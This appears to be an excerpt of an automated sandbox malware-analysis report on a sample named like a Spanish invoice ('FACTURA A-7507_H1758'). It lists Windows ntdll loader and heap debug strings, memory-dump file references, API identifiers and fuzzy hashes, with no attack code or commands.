                                                                                                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35499178
                                                                                                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3549914E, 35499173
                                                                                                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35499153
                                                                                                                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35499372
                                                                                                                                                                                                                          • Actx , xrefs: 35499315
                                                                                                                                                                                                                          • GsHd, xrefs: 3544D794
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 3542651C
                                                                                                                                                                                                                            • Part of subcall function 35426565: RtlDebugPrintTimes.NTDLL ref: 35426614
                                                                                                                                                                                                                            • Part of subcall function 35426565: RtlDebugPrintTimes.NTDLL ref: 3542665F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3548977C
                                                                                                                                                                                                                          • LdrpInitShimEngine, xrefs: 35489783, 35489796, 354897BF
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 354897A0, 354897C9
                                                                                                                                                                                                                          • apphelp.dll, xrefs: 35426446
                                                                                                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35489790
                                                                                                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 354897B9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-204845295
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35489854, 35489895
                                                                                                                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35489843
                                                                                                                                                                                                                          • LdrpLoadShimEngine, xrefs: 3548984A, 3548988B
                                                                                                                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35489885
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ---------------------------------------, xrefs: 354DEDF9
                                                                                                                                                                                                                          • Entry Heap Size , xrefs: 354DEDED
                                                                                                                                                                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 354DEDE3
                                                                                                                                                                                                                          • HEAP: , xrefs: 354DECDD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                                          • API String ID: 3446177414-1102453626
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                                          • API String ID: 3446177414-1194432280
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 354A344A, 354A3476
                                                                                                                                                                                                                          • LdrpFindDllActivationContext, xrefs: 354A3440, 354A346C
                                                                                                                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 354A3439
                                                                                                                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 354A3466
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                          • API String ID: 3446177414-3779518884
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DG@5, xrefs: 35452382
                                                                                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3549A79F
                                                                                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 3549A7A5
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3549A7AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: DG@5$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 0-3953938812
                                                                                                                                                                                                                          • Opcode ID: 2c1d8d0148160c14023718991554819a07aecfebd30942183f351bbd4bbd1524
                                                                                                                                                                                                                          • Instruction ID: 69868bb2854a498c940a88ebcea1cbc5d553a6c98f4cec84754a6723c6551d3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c1d8d0148160c14023718991554819a07aecfebd30942183f351bbd4bbd1524
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31A476A14200ABE71CDF6AD886E997BB6FB84B50F15049EFD01A7350DF70A943CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                          • String ID: ZKP
                                                                                                                                                                                                                          • API String ID: 4281723722-2362050067
                                                                                                                                                                                                                          • Opcode ID: e94cdd5a8ad176cefc3cb06cdd384124acb8a83e63edad310519095b32a07a0d
                                                                                                                                                                                                                          • Instruction ID: 7b4a8088ec0d34bd00dcc67139f0067f67275898aa85ceee7049ebb1d960829b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94cdd5a8ad176cefc3cb06cdd384124acb8a83e63edad310519095b32a07a0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB31F276E11218DFCF09DFA8E844A9EBBF1BB48720F10416AE911B7390DB356901CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                          • Opcode ID: 14a9a03428d9eaacd82956826ab8994b920ab7d1d0b06acee91bec5348488968
                                                                                                                                                                                                                          • Instruction ID: 068a41b7c8c63fb34ee1e0ddad7d380163eb35d1fae9917c9280fbdf3d96b1ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14a9a03428d9eaacd82956826ab8994b920ab7d1d0b06acee91bec5348488968
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2991F471308760BFE31DCB24C842B2AB7B6BF44A40F90059DE8459B381EB75E856CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 35499F1C
                                                                                                                                                                                                                          • LdrpCheckModule, xrefs: 35499F24
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35499F2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                                                                                                                          • Opcode ID: bf485120fe70aa2a4a40665b07bd15579c310b7cd5804cdd1a01610e8b4519f9
                                                                                                                                                                                                                          • Instruction ID: dda009b66453814c9b169f2d99219d5f584e6e19e6c5d1587e13e4cc5f5470ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf485120fe70aa2a4a40665b07bd15579c310b7cd5804cdd1a01610e8b4519f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D71E679A002059FEB0CDFA8C885BAEB7F1FB44714F1448ADE405E7350EB74A942CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 354A80E9
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 354A80F3
                                                                                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 354A80E2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                          • Opcode ID: b26f53068aa9832b37ffb08bfcf49616d497a2c30f3c0ad6cb5203585a31eeb3
                                                                                                                                                                                                                          • Instruction ID: 273329cb07359b948519429570df30f9aa12a9be90340a7269e92f2fbb10bb18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b26f53068aa9832b37ffb08bfcf49616d497a2c30f3c0ad6cb5203585a31eeb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2341DFB6615300ABD718DB64E840B4B77F9FF44A54F01986EB898A7250EF70E8018B96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 354B4508
                                                                                                                                                                                                                          • LdrpCheckRedirection, xrefs: 354B450F
                                                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 354B4519
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                          • Opcode ID: 50fd08ef2854c33d8f405d377fd7c3d1cbf4cce249da7ae2f97bb0958d38888e
                                                                                                                                                                                                                          • Instruction ID: 26aac743613ca588df052f89c192081a28b5bc952e2c0053c5db2cad2f4e66c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50fd08ef2854c33d8f405d377fd7c3d1cbf4cce249da7ae2f97bb0958d38888e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB41F4766043109BCF18CF58E840A1677E6BF48750F0506A9ECC9A7352EBB0E8219BA2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Wow64 Emulation Layer
                                                                                                                                                                                                                          • API String ID: 3446177414-921169906
                                                                                                                                                                                                                          • Opcode ID: 14350254844092176c18ddf56d026033dd25f32a7684e93a9abc3ddf6fddcb39
                                                                                                                                                                                                                          • Instruction ID: 03a65e655767178c68e0d887845261ae7bc56626b6dc2865d54b24088be9be85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14350254844092176c18ddf56d026033dd25f32a7684e93a9abc3ddf6fddcb39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6215EB5A0014DBFAF09AAA1CD88CFFBB7DEF44689B144059FE01A2104E7309E01DB30
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b09b48a718ae1bb393f00e6d8f5421b60afb942cc20e18540e969e92491b4674
                                                                                                                                                                                                                          • Instruction ID: ea390404939d6069c3994c4bfe6e959bac19ab1c2d31783b43d9b051215d5602
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b09b48a718ae1bb393f00e6d8f5421b60afb942cc20e18540e969e92491b4674
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE1E2B5D00708EFDB29CFA9D980A8DBBF1BF48324F14496AE546A7364DB70A841CF11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 5173f498a1483993b06029b6d92382540b0f323f681b2a3a183adc201cacff20
                                                                                                                                                                                                                          • Instruction ID: 9b8b3f4a520a4a63516e67439c54c2f2a467676e27555f0864be6e4ee4dac7e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5173f498a1483993b06029b6d92382540b0f323f681b2a3a183adc201cacff20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB716676E002299FEF49CFA5D884ADDBBB5BF58314F14402AE911EB340D734A916CF50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 2fbd1fcd191487a9d2814b90f7c741b93b5c628f54b6c20a8d52746fab6d7fb5
                                                                                                                                                                                                                          • Instruction ID: a24ec8094add8d751f8d437978420a86e64f6ff85232f7fe76f0cd620a874acf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fbd1fcd191487a9d2814b90f7c741b93b5c628f54b6c20a8d52746fab6d7fb5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0515A79714A16DFEB08CE19C8A0A1AB7F2BB89350B50456DED06DB710DBB1BC49CF80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 50277fd671c0bbc3debc172a6f6981c0149435c37697d4f10961af02bd41ad60
                                                                                                                                                                                                                          • Instruction ID: 087ca1b4c3639c9ab7f732280bac8f41cd1fee45f474e37af9401c93a52bf84a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50277fd671c0bbc3debc172a6f6981c0149435c37697d4f10961af02bd41ad60
